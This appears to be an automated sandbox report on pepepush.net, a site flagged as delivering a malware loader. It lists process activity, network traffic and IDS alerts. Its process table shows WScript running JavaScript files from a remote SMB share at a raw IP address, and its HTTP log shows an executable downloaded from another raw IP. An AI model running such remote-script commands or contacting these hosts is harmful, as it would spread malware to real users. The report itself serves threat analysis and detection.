| URL: | pepepush.net |
| Full analysis: | https://app.any.run/tasks/9166e5ef-1fb1-4293-8426-a6fe0c678546 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | February 15, 2024, 17:00:44 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 24F8A0DEB5FADB07FF8BBA2F728F5D19 |
| SHA1: | 0498A72E1307D1F3108022585B43A50F1ABD42B1 |
| SHA256: | 8A42C8FCA74A29B99FA62C63B5D7914BD010DB73B206E47FF182996833F3E9DE |
| SSDEEP: | 3:iWK:i5 |
MALICIOUS
Opens a text file (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Unusual connection from system programs
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Drops the executable file immediately after the start
- wscript.exe (PID: 1584)
- wscript.exe (PID: 2932)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Registers / Runs the DLL via REGSVR32.EXE
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
SUSPICIOUS
Uses pipe srvsvc via SMB (transferring data)
- iexplore.exe (PID: 2472)
- iexplore.exe (PID: 3536)
Reads the Internet Settings
- mshta.exe (PID: 3496)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Gets full path of the running script (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Connects to the server without a host name
- wscript.exe (PID: 1584)
Executable content was dropped or overwritten
- wscript.exe (PID: 1584)
- wscript.exe (PID: 2932)
Runs shell command (SCRIPT)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Saves data to a binary file (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 2932)
Writes binary data to a Stream object (SCRIPT)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 2932)
Adds/modifies Windows certificates
- wscript.exe (PID: 2932)
INFO
Manual execution by a user
- mshta.exe (PID: 3496)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- explorer.exe (PID: 1736)
- wscript.exe (PID: 2932)
- msedge.exe (PID: 3544)
Application launched itself
- iexplore.exe (PID: 2472)
- msedge.exe (PID: 3544)
Checks proxy server information
- mshta.exe (PID: 3496)
- wscript.exe (PID: 1584)
- wscript.exe (PID: 584)
- wscript.exe (PID: 2932)
Reads Internet Explorer settings
- mshta.exe (PID: 3496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
75
Monitored processes
31
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 584 | "C:\Windows\System32\WScript.exe" "\\85.195.115.20\share\reports_02.15.2024_1.js" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1000 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4060 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1404 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1632 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1408 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3708 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1584 | "C:\Windows\System32\WScript.exe" "\\85.195.115.20\share\1.js" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1736 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1972 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1504 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2068 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2192 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2168 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3568 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2324 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1248,i,8483475832003313270,11035800182036125942,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
Total events
32 291
Read events
31 950
Write events
254
Delete events
87
Modification events
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPDaysSinceLastAutoMigration |
Value: 1 | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPLastLaunchLowDateTime |
Value: | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPLastLaunchHighDateTime |
Value: 31088688 | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
| Operation: | write | Name: | NextCheckForUpdateLowDateTime |
Value: | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
| Operation: | write | Name: | NextCheckForUpdateHighDateTime |
Value: 31088688 | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (2472) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
Executable files
24
Suspicious files
144
Text files
106
Unknown types
251
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2472 | iexplore.exe | \Device\Mup:\85.195.115.20\PIPE\wkssvc | — | |
MD5:— | SHA256:— | |||
| 2472 | iexplore.exe | \Device\Mup:\85.195.115.20\PIPE\srvsvc | — | |
MD5:— | SHA256:— | |||
| 2472 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:8933DF09972B32F5E3E1E382F379D1EE | SHA256:C901127B89B7579AA2D1E883A63BCBE0DDEE340546FE8ED173FA980C9761F011 | |||
| 3536 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | binary | |
MD5:53AFD6FB4C0C4E9D5DC4AC51D2A43881 | SHA256:D233EB3D59C74F10CCE47C7E4F1E76FCF1E3686BF4DDF90D3F7C7C8D5BC17F03 | |||
| 2472 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml | xml | |
MD5:CBD0581678FA40F0EDCBC7C59E0CAD10 | SHA256:159BD4343F344A08F6AF3B716B6FA679859C1BD1D7030D26FF5EF0255B86E1D9 | |||
| 2472 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | der | |
MD5:6980955238EDB170F1C373F6682991F5 | SHA256:D0AD8895665854A4E0D81D07932E01A8C7313B00C66B98637B2BD9E929501B6A | |||
| 2472 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\42N7KPJL.txt | text | |
MD5:2C838F53C464A6FEF8F807B4AF294BD5 | SHA256:35731EC5DD80631F8D0CB9198D3EE8C87D8EF752B4B01C9A4F492DFF53A21EA1 | |||
| 3536 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | binary | |
MD5:8EB2DACD4C4330609B6E89B828C67898 | SHA256:892381F7A9B0E4239F9E7E0B02AB00754940A73B899F144D42D2565299743CBD | |||
| 2472 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | binary | |
MD5:B82041534C7E6E7D36DF47973CC0C4D5 | SHA256:DF1389FBDEDC2043918A6A6955C7FD9A44D763E61DB39D5E2372F74D2F81D7A6 | |||
| 2472 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\urlblockindex[1].bin | binary | |
MD5:FA518E3DFAE8CA3A0E495460FD60C791 | SHA256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
82
DNS requests
92
Threats
12
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2472 | iexplore.exe | GET | 304 | 87.248.202.1:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?18014fff35250a83 | unknown | — | — | — |
2472 | iexplore.exe | GET | 304 | 87.248.202.1:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?76ad697231f9b13b | unknown | — | — | — |
3536 | iexplore.exe | GET | 404 | 139.45.197.228:80 | http://pepepush.net/ | unknown | html | 146 b | — |
2472 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 312 b | — |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAxq6XzO1ZmDhpCgCp6lMhQ%3D | unknown | binary | 471 b | — |
1080 | svchost.exe | GET | 200 | 87.248.202.1:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3e412f7b4eff0943 | unknown | compressed | 65.2 Kb | — |
2472 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | — |
1080 | svchost.exe | GET | 304 | 87.248.202.1:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e90c163b6659448e | unknown | compressed | 65.2 Kb | — |
2472 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | binary | 471 b | — |
1584 | wscript.exe | GET | 200 | 77.245.76.113:80 | http://77.245.76.113/1s6iL/BtCxD | unknown | executable | 3.60 Mb | — |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | unknown |
3536 | iexplore.exe | 139.45.197.228:80 | pepepush.net | RETN Limited | GB | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2472 | iexplore.exe | 92.122.215.53:443 | www.bing.com | Akamai International B.V. | DE | unknown |
2472 | iexplore.exe | 87.248.202.1:80 | ctldl.windowsupdate.com | LLNW | NL | unknown |
2472 | iexplore.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown |
3536 | iexplore.exe | 13.107.5.80:443 | api.bing.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
828 | svchost.exe | 239.255.255.250:3702 | — | — | — | unknown |
3536 | iexplore.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
pepepush.net |
| unknown |
api.bing.com |
| unknown |
www.bing.com |
| unknown |
ctldl.windowsupdate.com |
| unknown |
ocsp.digicert.com |
| unknown |
r20swj13mr.microsoft.com |
| unknown |
iecvlist.microsoft.com |
| unknown |
ieonline.microsoft.com |
| unknown |
go.microsoft.com |
| unknown |
www.msn.com |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempt to connect to an external SMB server |
— | — | Potential Corporate Privacy Violation | POLICY [ANY.RUN] NTLM Over SMB (NTLMSSP_NEGOTIATE) |
— | — | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Query an EXE file via SMB2 from an external server |
— | — | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Reading an Executable file via SMB2 from an external server |
— | — | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
— | — | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
— | — | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | A Network Trojan was detected | ET MALWARE JS/WSF Downloader Dec 08 2016 M4 |
— | — | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
2 ETPRO signatures available at the full report